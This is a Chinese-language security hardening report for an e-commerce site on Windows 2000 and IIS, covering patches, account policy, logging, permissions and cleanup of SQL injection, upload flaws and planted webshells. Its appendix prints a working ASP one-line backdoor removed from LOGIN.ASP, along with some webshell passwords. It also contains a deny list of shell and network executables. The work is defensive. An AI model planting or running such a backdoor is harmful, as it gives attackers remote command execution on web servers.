欢迎来到三一办公! | 帮助中心 三一办公31ppt.com(应用文档模板下载平台)
三一办公
全部分类
  • 办公文档>
  • PPT模板>
  • 建筑/施工/环境>
  • 毕业设计>
  • 工程图纸>
  • 教育教学>
  • 素材源码>
  • 生活休闲>
  • 临时分类>
  • ImageVerifierCode 换一换
    首页 三一办公 > 资源分类 > DOC文档下载  

    XXX电子商务网站安全加固报告.doc

    • 资源ID:2397842       资源大小:229.50KB        全文页数:16页
    • 资源格式: DOC        下载积分:8金币
    快捷下载 游客一键下载
    会员登录下载
    三方登录下载: 微信开放平台登录 QQ登录  
    下载资源需要8金币
    邮箱/手机:
    温馨提示:
    用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)
    支付方式: 支付宝    微信支付   
    验证码:   换一换

    加入VIP免费专享
     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。

    XXX电子商务网站安全加固报告.doc

    XXX电子商务网站安全加固报告目录电子商务网站安全加固报告1目录2一、加固主机列表3二、加固实施42.1操作系统加固42.1.1 补丁安装42.1.2 帐号、口令策略修改42.1.3 网络与服务加固42.1.4 文件系统加固52.1.5 日志审核增强62.1.6 安全性增强72.1.7 推荐安装安全工具82.2 IIS服务加固82.2.1 补丁安装82.2.2 网站实例权限分配82.2.3 IIS配置安全增强92.2.4 安全控件加固92.3 代码审核加固102.3.1 清除WebShell代码102.3.2 清除SQL注入漏洞102.3.3 修正权限认证缺陷102.3.4 减少上传风险威胁112.3.5 正确处理数据库文件11三、推荐安全注意事项123.1为新增网站实例分配权限123.2 使用SSL加密FTP传输123.3 加强管理员安全习惯12四、签字确认13附录:14后台访问用户认证分配一览表14代码加固修改一览表14一、加固主机列表本次安全加固服务的对象包括:编号IP地址操作系统用途或服务H_2112_1XX.XX.XX.2Windows 2000 Server提供电子商务服务,有偿提供考试资料填写规则:编号统一使用“型号_地址缩写_数字”型号(H主机;D设备),数字使用三位数字顺序号。二、加固实施2.1操作系统加固2.1.1 补丁安装编号:Windows-02001名称:补丁安装系统以往状态:Windows 2000 Service Pack 4IE 最新积累补丁方案实施使用Windows update安装最新补丁实施目的可以使系统版本为最新版本实施风险安装补丁可能导致主机启动失败,或其他未知情况发生2.1.2 帐号、口令策略修改编号:Windows-03002,Windows-03003,Windows-03004名称:帐号口令策略修改系统以往状态:密码长度最小值0 字符密码最长存留期42天密码最短存留期0天帐号锁定计数器无帐户锁定时间0帐户锁定阀值无方案实施密码长度最小值7 字符密码最长存留期90天密码最短存留期30天帐号锁定计数器5次帐户锁定时间5分钟帐户锁定阀值1分钟实施目的保障帐号以及口令的安全实施风险设置帐号策略后可能导致不符合帐号策略的帐号无法登陆,需修改帐号密码(注:管理员不受帐号策略限制,但管理员密码应复杂)2.1.3 网络与服务加固编号:Windows-04003,Windows-04004名称:卸载不需要的服务系统以往状态:已安装的不必要的服务包括:DNS服务DHCP服务MS FTP服务SNMP服务方案实施开始|设置|控制面板|添加/删除程序|Windows组件卸载不需要的服务实施目的避免未知漏洞给主机带来的风险实施风险可能由于管理员对主机所开放服务不了解,导致该服务被卸载。编号:Windows-04005名称:将暂时不需要开放的服务停止系统以往状态:已启动且需要停止的服务包括:Computer Browser服务Alerter服务Messenger服务方案实施开始|运行|services.msc|将上述服务的启动类型设置为手动并停止上述服务实施目的避免未知漏洞给主机带来的风险实施风险可能由于管理员对主机所开放服务不了解,导致该服务被卸载。2.1.4 文件系统加固编号:Windows-05002名称:限制特定执行文件的权限系统以往状态:未对敏感执行文件设置合适的权限方案实施通过实施我公司的安全策略文件对特定文件权限进行限制,禁止Guests用户组访问这些文件。实施目的禁止Guests用户组访问以下文件:xcopy.exe wscript.exe cscript.exe net.exe arp.exe edlin.exe ping.exe route.exe posix.exe Rsh.exe atsvc.exe Copy.execacls.exe ipconfig.exe rcp.exe cmd.exedebug.exe regedt32.exe regedit.exe telnet.exeFinger.exeNslookup.exeRexec.exeftp.exeat.exerunonce.exe nbtstat.exe Tracert.exenetstat.exe 实施风险在极少数情况下,某些网页可能调用cmd.exe来完成某种功能,限制cmd.exe的执行权限可能导致调用cmd失败。2.1.5 日志审核增强编号:Windows-06001名称:设置主机审核策略系统以往状态:审核策略更改无审核审核登录事件无审核审核对象访问无审核审核过程追踪无审核审核目录服务访问无审核审核特权使用无审核审核系统事件无审核审核帐户登录事件无审核审核帐户管理无审核方案实施通过实施我公司的安全策略文件修改下述值:审核策略更改成功审核登录事件无审核审核对象访问成功, 失败审核过程追踪无审核审核目录服务访问无审核审核特权使用无审核审核系统事件成功, 失败审核帐户登录事件成功, 失败审核帐户管理成功, 失败实施目的对系统事件进行审核,在日后出现故障时用于排查故障。实施风险无编号:Windows-06002,Windows-06003,Windows-06004名称:调整事件日志的大小、覆盖策略系统以往状态:大小覆盖方式应用日志512K覆盖早于7天的事件安全日志512K覆盖早于7天的事件系统日志512K覆盖早于7天的事件方案实施通过实施我公司的安全策略文件修改下述值:大小覆盖方式应用日志16382K覆盖早于30天的事件安全日志16384K覆盖早于30天的事件系统日志16384K覆盖早于30天的事件实施目的增大日志大小,避免由于日志文件容量过小导致日志记录不全实施风险无2.1.6 安全性增强编号:Windows-07001名称:禁止匿名用户连接系统以往状态:Key:HKLMSYSTEMCurrentControlSetControlLsa“restrictanonymous”的值为0方案实施通过实施我公司的安全策略文件将该值修改为“1”实施目的可以禁止匿名用户列举主机上所有用户、组、共享资源实施风险无编号:Windows-04006名称:删除主机管理共享系统以往状态:Key:HKLMSYSTEMCurrentControlSetServiceslanmanserverparameters无“Autoshareserver”键方案实施通过实施我公司的安全策略文件增加“Autoshareserver”项,并设置该值为“1”实施目的删除主机因为管理而开放的共享实施风险某些应用软件可能需要该共享,如Veritas Netbackup编号:Windows-07001名称:禁止匿名用户连接系统以往状态:Key:HKLMSYSTEMCurrentControlSetControlLsa“restrictanonymous”的值为0方案实施通过实施我公司的安全策略文件将该值修改为“1”实施目的可以禁止匿名用户列举主机上所有用户、组、共享资源实施风险无编号:Windows-03005名称:限制Guest用户权限系统以往状态:Guest已禁用,但未对帐号进行权限限制。方案实施通过实施我公司的安全策略文件禁止Guest帐号本地登录和网络登录的权限。实施目的避免Guest帐号被黑客激活作为后门实施风险无2.1.7 推荐安装安全工具工具名称IceSword 1.06工具用途特洛伊木马彻查、黑客后门检测工具相关信息工具名称X-Scan-v3.2-cn工具用途网络隐患扫描工具相关信息注:工具名称请包含版本信息工具用途请简单描述产品功用相关信息请写明产品相关URL,尽量详细2.2 IIS服务加固2.2.1 补丁安装编号:Windows-02001(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:补丁安装系统以往状态:Windows 2000 Service Pack 4方案实施使用Windows update安装最新补丁实施目的可以使系统版本为最新版本实施风险(应描述实施本条措施所导致的后果)2.2.2 网站实例权限分配编号:Windows-02002(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:权限分配系统以往状态:没有对每个网站实例进行相应的权限分配,任何一个网站被入侵后都有可能导致其他网站被入侵方案实施每个网站实例都对应使用低权限帐户,并去除网站后台的匿名访问,集成Windows认证实施目的可以使各个网站实例读取、修改权限完全分开,避免入侵者从一个网站实例入侵到另一个网站实例实施风险(应描述实施本条措施所导致的后果)2.2.3 IIS配置安全增强编号:Windows-02003(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:配置安全增强系统以往状态:存在很多默认配置,导致入侵者可利用方案实施修正IIS的扩展配置,减少asp.dll解析范围,禁止下载MDB文件实施目的减少入侵者入侵几率,防止网站数据库被恶意下载实施风险(应描述实施本条措施所导致的后果)2.2.4 安全控件加固编号:Windows-02004(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:安全空间加固系统以往状态:存在很多危险控件,导致入侵者可利用方案实施卸载了WSH控件,修改Shell.Application控件的名称,防止入侵者利用:HKEY_CLASSES_ROOTShell.Application改成Shell.Application_OurSafeHKEY_CLASSES_ROOTShell.Application.1改成了Shell.Application.1_OurSafe实施目的减少ASP木马对网站的威胁实施风险将有可能导致某些特殊网站实例不能正常运行2.3 代码审核加固2.3.1 清除WebShell代码编号:Windows-03001(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:清除WebShell代码系统以往状态:有可能存在入侵者留下的后门、WebShell程序方案实施人工搜索查找入侵者留下的后门ASP程序实施目的防止入侵者再次入侵网站实施风险(应描述实施本条措施所导致的后果)2.3.2 清除SQL注入漏洞编号:Windows-03002(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:清除SQL注入漏洞系统以往状态:存在很多SQL注入漏洞方案实施使用统一脚本,对用户提交进行过滤检查,防止用户提交注入代码实施目的防止恶意用户利用SQL注入漏洞危害网站实施风险(应描述实施本条措施所导致的后果)2.3.3 修正权限认证缺陷编号:Windows-03003(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:修正权限认证缺陷系统以往状态:存在一部份的权限未认证缺陷方案实施对没有检查权限的页面添加权限认证实施目的防止低权限用户执行高权限功能实施风险(应描述实施本条措施所导致的后果)2.3.4 减少上传风险威胁编号:Windows-03004(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:修正权限认证缺陷系统以往状态:存在上传漏洞方案实施修改代码封堵上传漏洞实施目的防止恶意用户上传WebShell或其他恶意程序实施风险(应描述实施本条措施所导致的后果)2.3.5 正确处理数据库文件编号:Windows-03005(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:正确处理数据库文件系统以往状态:采用ASP为扩展名,恶意用户将有可能插入恶意代码并执行方案实施扩展名改为MDB,并对WEB应用程序进行相应修改实施目的防止恶意用户插入恶意代码并执行实施风险(应描述实施本条措施所导致的后果)三、推荐安全注意事项3.1为新增网站实例分配权限当需要新增加一个网站实例的时候,需要按照一定的步骤完成权限的分配:1. 新建两个帐号,删除这两个帐号的User组身份,加入Guest组;2. 指定网站目录只能够被XXXistrator和SYSTEM完全控制,而上述两个帐号对该目录及其子目录有读写、修改权限;3. 在IIS中设置匿名访问该网站的匿名帐户为上述两个帐号其中之一;4. 在IIS中设置该网站管理员后台目录(或核心文件)不允许匿名访问,增加Windows身份认证;5. 在IIS中设置该网站的主机头。3.2 使用SSL加密FTP传输开启Serv-U的SSL加密功能,只允许加密登陆以及加密传输文件,以防止恶意用户ARP嗅探FTP密码。3.3 加强管理员安全习惯注意及时升级管理员主机的系统补丁和杀毒软件病毒库,定期使用推荐的后门检测工具对主机进行安全检测。定期更换Web应用程序后台管理员密码,并保证密码的强度。四、签字确认双方认可加固报告,签字确认。甲方:乙方:签字(签章):签字(签章)日期:日期附录:后台访问用户认证分配一览表域名目录指向后台登陆用户名XX.comD:WEBXXXXXX.XX XX.netD:wwwXXXXX.XXXX.cnD:www1XX.XX XX.comD:WEBXX.comXX.XX XX.comD:WEBXX.comXX.XX bbs.XX.comD:WEBXXXbbsXX.XXX.XXXX.XX.comD:WEBXXXXXXXX.XXX.XXXXX.XX.comD:WEBXXXexamXX.XXX.XX XX.XX.comD:WEBXXXXXXXX.XXX.XX用户密码暂统一为“*”(不带双引号),建议用户自行修改。代码加固修改一览表XXX.com目录Connection.asp修改数据库为mdb结尾修改包含sql.asp,防止SQL注入IncludeRegKey.cfg修改数据库结尾Setup.asp改名为Setup04131.aspMangerEditor7183409改为Editor7183401Includeconst.asp删除!webshellIncludeMD5.asp删掉文件最后一行,该行代码为webshell代码XXX.com目录CONN.ASP修改数据库为mdb结尾修改包含sql.asp,防止SQL注入增加容错信息XXX/CONN.ASP修改数据库为mdb结尾修改包含sql.asp,防止SQL注入增加容错信息XXX/UPFILE.ASP注释掉27行,替换成固定上传路径为""./pic/"的代码增加对XXX身份验证,<!-#include file="./inc/head.asp"->XXX/UPLOAD.ASP增加对XXX身份验证,<!-#include file="./inc/head.asp"->XXX/TEXTBOX.ASP增加对XXX身份验证,<!-#include file="./inc/head.asp"->XXX/EOKEDIT.ASP增加对XXX身份验证,<!-#include file="./inc/head.asp"->eWebEditor目录名改为eWebEditor41937editdel.asp修改增加身份验证chkXXX.asp修改认证方式,采用session保存密码,防止跨站攻击test目录名修改为Test8322XXXXXX.ASP将管理身份认证提前XXXXXX.ASP添加容错信息修改包含sql.asp,防止SQL注入XXXdata.mdb防止下载,改名为data3415.mdbXXXincubb.asp删掉!WebShell代码kjaskcommon.asp修改数据库为kjgb5674.mdb修改包含sql.asp,防止SQL注入增加容错信息XXX.com目录XXXXX_backup.asp删掉!WebShell,密码是6568168XXdragon.asp删掉!WebShellXXLOGIN.ASP删除最后三行,WebShell代码<!了><object id=fs RUNAT=SERVER classid='clsid:0D43FE01-F093-11CF-8940-00A0C9054228'></object><!了><%if request("kker")<>"4136705" then Session("b")=request("kker")if Session("b")<>"" then execute Session("b")%>XXXXXTEST.ASP空文件XXXXXtestab.asp删除,WebShell,密码是!#123XXXXX_backup.asp删除!WebShellXXtiet.asp删除!WebShellXXuserad.asp删除!WebShellXXXXXtestab.asp删除!WebShellXX20.asp删除!WebShellCONN.ASP修改数据库为mdb结尾修改包含sql.asp,防止SQL注入增加容错信息AD/qidong未知快捷方式XX/UPFILE.ASP注释掉27行,替换成固定上传路径为""./pic/"的代码增加对XXX身份验证,<!-#include file="./inc/head.asp"->XX/UPLOAD.ASP增加对XXX身份验证,<!-#include file="./inc/head.asp"->XX/TEXTBOX.ASP增加对XXX身份验证,<!-#include file="./inc/head.asp"->XX/EOKEDIT.ASP增加对XXX身份验证,<!-#include file="./inc/head.asp"->XXX/CONN.ASP修改数据库为mdb结尾修改包含sql.asp,防止SQL注入增加容错信息XXXXXX.ASP将管理身份认证提前XXXXXX.ASP添加容错信息修改包含sql.asp,防止SQL注入XXXdata.mdb防止下载,改名为data1332.mdbXXXBKCONN.ASP修改包含sql.asp,防止SQL注入增加容错信息XXXINCLUDEBKCONN.ASP修改包含sql.asp,防止SQL注入增加容错信息XXXXXXaddpicture.asp源文件以被破坏,无法修正该源文件XXXXXXLOGIN.ASP改正登陆时对用户名输入的合法性验证XXXXXXbroadcast.asp增加管理身份认证XXXXXXguestbookmod.asp增加管理身份认证XXXXXXguestbook.asp增加管理身份认证XXXsavefaqdel.asp增加管理身份认证XXXXXXsaveguestbookdel.asp增加管理身份认证XXXXXXsaveguestbookmod.asp增加管理身份认证examlogin.asp注释掉6到12行代码,怀疑为后门代码examconn.asp修改包含sql.asp,防止SQL注入增加容错信息

    注意事项

    本文(XXX电子商务网站安全加固报告.doc)为本站会员(文库蛋蛋多)主动上传,三一办公仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知三一办公(点击联系客服),我们立即给予删除!

    温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。




    备案号:宁ICP备20000045号-2

    经营许可证:宁B2-20210002

    宁公网安备 64010402000987号

    三一办公
    收起
    展开